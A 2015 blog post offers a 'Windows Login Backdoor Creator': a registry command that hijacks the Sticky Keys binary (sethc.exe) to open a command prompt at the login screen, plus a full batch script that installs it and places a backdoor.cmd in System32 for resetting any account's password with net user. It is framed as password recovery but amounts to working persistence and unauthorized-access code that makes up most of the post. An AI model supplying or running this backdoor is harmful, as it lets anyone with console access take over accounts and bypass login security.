Saturday, February 21, 2015

Windows Login Backdoor Creator V2.0

Note: This is a revision of the original post 'Creating backdoor at Windows login to reset password after losing it.' found here.

Over the years I have had many people ask me how to get into their computer after they have forgotten their password. There are a few ways to do this either with a bootable cd or usb stick with a 3rd party application, but to be honest this is very unsafe as anyone can get the cd and break into a computer and at the same time you or anyone else that uses such software can cause users or admins to lose data.

The only really safe way to do it is through your command prompt, but without knowing your password to get into the profile to use the console then you are screwed. Recently I have discovered a way to be able to access your command prompt from the Windows login screen by adding a value to the registry. Now you can create a registry file (.reg) to do this, but today we will just add it via the command prompt:


1. You must open your cmd (command prompt) as administrator so you can't open it from run. You must go to your start screen type "cmd" in the search bar and when you see it right click on it and select "Run as administrator".

2. Type the code below into the prompt:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Triple click on the above code to select all then copy and paste into your command prompt and hit "ENTER".

You now have access to the the command prompt at the Wcndows login screen.

Gain access by either:

  • Pressing SHIFT+ALT+PRTSC (Print Screen) or;
  • Hitting the SHIFT key 5 times in a row (good ol' Sticky Keys).



If you or anyone else on your Windows OS ever loses their password (or you just want to do anything else that you can do from the prompt) you can do it without logging in (be careful though!).

3. When you need to change your password from the prompt, type:
net user username password
Where username is, of course, your username and password your new password.

EXAMPLE:
net user bob apples
Would change user bob's password to apples etc...

If your name has a space in it you must wrap quotation marks around the name as a space denotes a new command. You must enter it like:

net user "bob for" apples


4. Login with your new password!



Downloads:

New version 2.0 is 90% re-written with 32 and 64 bit versions to accommodate x86 issues.

    Version Info
  • V1.0 - Original, batch script only. Bugs: Batch quote issue in paths, installs to wrong path on x86 systems with SysWOW. Bug fixes: none.
  • V2.0 - New re-write, 32 and 64 bit executables. Bugs: No known bugs. Bug fixes: Fixed batch quotes in paths issue, fixed install wrong locations issue.
      Features
    • Checks for registry value and script file and either installs the backdoor or fixes any part that may be broken.
    • Now runs great on Windows XP/Vista/7/8 32 and 64 bit.
I have created a batch file to automate this process so you don't have to do half of this. You can either download it here (Outdated V1.0 old script for archives) or if you are scared of downloading files you can just copy and paste the text below into a batch you create.

  • Right click on your desktop and select New>TXT File.
  • Rename the file from "New Text Document.txt" to "whateveryouwant.bat" (if you can't see the extension just go into folder options and uncheck "Hide extensions of known applications" or something like that.
  • Once it's a bat file right click on it and select "Edit". and paste the code below into it and save the file
  • Right click on the bat file you have created and select "Run as administrator" and it will run.
Code to paste in your batch file:
@echo off
Title Windows Login Backdoor Creator
color 0A
set "_bscript=%windir%/System32/backdoor.cmd"
cls
mode 54,4
echo(
echo Checking to see if script or registry value exist...
echo(
call :to
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger>nul
cls

if [%errorlevel%]==[1] if not exist "%_bscript%" (
call :notFound
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[0] if not exist "%_bscript%" (
mode 49,5
echo(
echo Registry value exists, but the script does not.
echo Writing script file now...
echo(
call :to
call :writeScript
cls
call :howTo
call :md
goto :eof
)

if [%errorlevel%]==[1] if exist "%_bscript%" (
mode 49,5
echo(
echo Script exists, but the registry value does not.
echo Writing registry value now...
echo(
call :to
call :writeReg
cls
call :howTo
call :md
goto :eof
)
mode 48,5
echo(
echo Both the script and registry value were found,
echo no need to do anything.
echo(
pause
call :md
goto :eof

:notFound
mode 45,5
echo(
echo Backdoor was not found, writing both the
echo regsitry value and the script file....
echo(
call :to
call :writeBoth
cls
exit /b

:writeBoth
call :writeReg
call :writeScript
exit /b

:writeReg
echo(
echo Creating registry key....
echo(
call :to
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
exit /b

:writeScript
mode 55,4
echo(
echo Creating script^: %_bscript%...
echo(
call :to
if exist "%_bscript%" del "%_bscript%"
echo Creating backdoor.cmd file...
echo @echo off > %_bscript%
echo title Creat New User Password >> %_bscript%
echo echo Enter username to reset your password: >> %_bscript%
echo set name= >> %_bscript%
echo set pass= >> %_bscript%
echo set /P name="Username:" >> %_bscript%
echo set /P pass="New Password:" >> %_bscript%
echo net user "%%name%%" "%%pass%%" >> %_bscript%
echo timeout /t 3 ^>NUL >> %_bscript%
echo exit >> %_bscript%
exit /b

:howTo
mode 36, 10
echo To run:
echo(
echo At the login screen either press
echo shift+ctrl+printscreen (or prtsc)
echo or hit shift 5 times. This will
echo bring up the command prompt. At
echo the prompt type "backdoor" into
echo the new password screen and follow
echo the instructions.
echo(
pause
cls
exit /b

:to
timeout /t 3 >nul
exit /b

:md
color 0F
mode 80,25
exit /b

New icon I made for it:

 photo green-backdoor_zps376b76e9.png

Once it starts it will enter the registry entries as provided above to create the access to the command prompt at Windows login and it will also create a batch file located in you System32 fold called "backdoor.bat" which will start you through an automated easy process to change your password, so no need to type the commands yourself just run the backdoor file. This batch files is run from your command prompt by typing "backdoor" or "backdoor.bat" and it

  • Run this batch file from the command prompt bay typing "backdoor" or "backdoor.bat" and hit "Enter".
  • It will easily guide you through the process of changing your password in just a couple of steps
Again, login and enjoy!!!

No comments: